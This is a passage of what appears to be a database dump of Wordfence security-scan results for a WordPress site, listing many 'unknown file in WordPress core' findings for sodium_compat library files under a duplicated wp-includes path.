target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Salsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78048,1675048868,1675048868,'new','knownfile',75,'2f6f4565c233ec04b240a65b6e333555','2982e8ff55ea87813c59c83e1165c150','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/SipHash.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/SipHash.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78049,1675048868,1675048868,'new','knownfile',75,'278d5d68a2acc2cf39f511c8cfe13f47','0f1eb6123ba7334412ebe03ac6a24093','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Util.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:62:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Util.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78050,1675048868,1675048868,'new','knownfile',75,'b8c0fa856b4de51d3f192d6893cd9d1e','4a6a8adbcac1aad4f34ac9788e9a97a8','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/X25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/X25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78051,1675048868,1675048868,'new','knownfile',75,'40b08879462383faf8bd88f0a7416155','e2b7a75a71f2fa73299e5034c83a7072','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/XChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78052,1675048868,1675048868,'new','knownfile',75,'49667306b8a79a4581aa8c513c9a7bc0','baad78c4c1c51a1cd8cd076702802632','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/namespaced/Core/Xsalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78053,1675048868,1675048868,'new','knownfile',75,'118245a93dcdb367b179cf77f8bb2ef6','d2c45c965bcfbe2288496dd48156428f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/Crypto.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/namespaced/Crypto.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78054,1675048869,1675048869,'new','knownfile',75,'4a7b7455185d94da5938b6debe855ce8','4ddfb1ef8825a1198a5efa1ba6c18bf1','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/namespaced/File.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/sodium_compat/namespaced/File.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78055,1675048869,1675048869,'new','knownfile',75,'25056205a844ea5b8c193969998870cf','31500418ddfd59bcf9c56a9ff07d1760','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Compat.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:52:\"wp-includes/wp-includes/sodium_compat/src/Compat.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78056,1675048869,1675048869,'new','knownfile',75,'d9ba263d402bd8281782f26189f241be','5959516176a2a9877e9a63a76eb9a30f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/BLAKE2b.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core/BLAKE2b.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78057,1675048869,1675048869,'new','knownfile',75,'56cc6cc02c7e3e57f028136b77c14ec8','885b85acca28bb9f73c42e8701a26634','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Base64/Common.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/sodium_compat/src/Core/Base64/Common.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78058,1675048869,1675048869,'new','knownfile',75,'5ba40268ce12ca7dc00dd16be7da6eb0','4d0b91f94f61b77735becafa967ba975','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Base64/Original.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:66:\"wp-includes/wp-includes/sodium_compat/src/Core/Base64/Original.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78059,1675048869,1675048869,'new','knownfile',75,'d79712436017fbbb705d5dcb49f02ab6','bd55d3b90961a8f5fffe26481fdc4653','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/Core/Base64/UrlSafe.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78060,1675048869,1675048869,'new','knownfile',75,'59f299dbebe00f224382a0d1d297c861','57ea9233a333f1aed783c046d7aad5f2','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/Ctx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78061,1675048869,1675048869,'new','knownfile',75,'2efa6f9ab33fb430f1750fc82ff6fab4','d20b3e6e69af7dfa6fbd3223b9e8a320','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20/IetfCtx.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78062,1675048869,1675048869,'new','knownfile',75,'52b1b19541e71eb9b63fcc518e7599ba','8a208c4214b80857a4165b721cd1368e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core/ChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78063,1675048869,1675048869,'new','knownfile',75,'407134fea0316e6cffc531c49c671139','f5c415fbe1db6d98f8364e5e62432241','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:64:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Fe.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78064,1675048869,1675048869,'new','knownfile',75,'e231d4f0f6c389122f1e9238f558b1c1','3ba2e4ebc788a91cbadd7dd673499cc2','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:71:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Cached.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78065,1675048869,1675048869,'new','knownfile',75,'53c4a2383b83c565a2c454e6b5361f03','65f2001f44490ed0d1da0a0df56cf37b','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P1p1.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78066,1675048869,1675048869,'new','knownfile',75,'b138f065212addde9024d16a686968f0','96c1cdc6fcbe9e1270b4c4009d7e55e9','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P2.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78067,1675048869,1675048869,'new','knownfile',75,'9d4f64c54d68688814cda516834f123d','3734999e09d5daf287d1aed81f680154','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/P3.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78068,1675048869,1675048869,'new','knownfile',75,'0f2acd82364ccbfc566c5bd481901604','460bb4a51c68ffc50ed0003fd986f335','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:72:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/Ge/Precomp.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78069,1675048869,1675048869,'new','knownfile',75,'004ce424c9e3503baea3fd00e3e46cbc','0519acb3ae80b2b01b585c0962f037dc','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/H.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:63:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/H.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78070,1675048869,1675048869,'new','knownfile',75,'181495d0c7188ffcfefd0f5c792219c9','c425cb4f27ec47b978ac7ea0ad73cfd6','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/README.md','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:67:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519/README.md\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78071,1675048870,1675048870,'new','knownfile',75,'7ae6562935ae3381dad8bccee5c9ba6d','785cf174b93d19cfe8d838ca6aec213e','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Curve25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:61:\"wp-includes/wp-includes/sodium_compat/src/Core/Curve25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78072,1675048870,1675048870,'new','knownfile',75,'281f1cdb9147d68a18f2a8cf90c74892','e014ac37ac0c2ef24cf163e65a71bfa7','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Ed25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core/Ed25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78073,1675048870,1675048870,'new','knownfile',75,'ac9edf7d0d07feb79add1411bf6bbfd1','9dc4ced8c4b715ea8d34b34eea64cd4a','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/HChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core/HChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78074,1675048870,1675048870,'new','knownfile',75,'367c972392fde7a15cd46ea6fccefae1','a3892f1edbfe6e0c60f59558c3a01e1f','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/HSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core/HSalsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78075,1675048870,1675048870,'new','knownfile',75,'04112a0500c2a6afa56e247ef6f447d3','4015050b90e709518ce7f3ed322fe3ef','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Poly1305/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:65:\"wp-includes/wp-includes/sodium_compat/src/Core/Poly1305/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78076,1675048870,1675048870,'new','knownfile',75,'e88755ed76d4a388b5a178b2d06089c2','1cd9b361bde83248eb8aabec5f2e1c53','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Poly1305.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:59:\"wp-includes/wp-includes/sodium_compat/src/Core/Poly1305.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78077,1675048870,1675048870,'new','knownfile',75,'ec6cd28373e62f78e99583027cb56223','32268b7457ee23c7a70b246bdec953f4','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Salsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core/Salsa20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78078,1675048870,1675048870,'new','knownfile',75,'b0a2faa9637a454de62b04ef674c8458','cc43fa91254d088c97581697e4ab7a15','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/SecretStream/State.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:69:\"wp-includes/wp-includes/sodium_compat/src/Core/SecretStream/State.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78079,1675048870,1675048870,'new','knownfile',75,'88c40fbc103c930ec00d177f1925252c','21a1e17513094ee635f46c2251a9fa3a','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/SipHash.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:58:\"wp-includes/wp-includes/sodium_compat/src/Core/SipHash.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78080,1675048870,1675048870,'new','knownfile',75,'506bb669618039a91f34271ad5936400','21a7b8800707f39140a6dec43d233fc8','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/Util.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:55:\"wp-includes/wp-includes/sodium_compat/src/Core/Util.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78081,1675048870,1675048870,'new','knownfile',75,'7d31100b69f14ba7a50051a9747f5079','272c06a7e8bf23232a83a7644d3af602','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/X25519.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:57:\"wp-includes/wp-includes/sodium_compat/src/Core/X25519.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78082,1675048870,1675048870,'new','knownfile',75,'9429230fa2bcbe013d137abe3d5b4581','e92e0aa2a10768dc69ca86c06d85be64','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/XChaCha20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" target=\"_blank\" rel=\"noopener noreferrer\">Learn More<span class=\"screen-reader-text\"> (opens in new tab)</span></a>','a:5:{s:4:\"file\";s:60:\"wp-includes/wp-includes/sodium_compat/src/Core/XChaCha20.php\";s:5:\"cType\";s:4:\"core\";s:7:\"canDiff\";b:0;s:6:\"canFix\";b:0;s:9:\"canDelete\";b:1;}'),(78083,1675048870,1675048870,'new','knownfile',75,'ccd811f67066924dc7c88d473318b067','57fe89dede81647e2497453399c219ae','Unknown file in WordPress core: wp-includes/wp-includes/sodium_compat/src/Core/XSalsa20.php','This file is in a WordPress core location but is not distributed with this version of WordPress. This scan often includes files left over from a previous WordPress version, but it may also find files added by another plugin, files added by your host, or malicious files added by an attacker. <a href=\"https://www.wordfence.com/help/?query=scan-result-unknown-file-in-wordpress-core\" 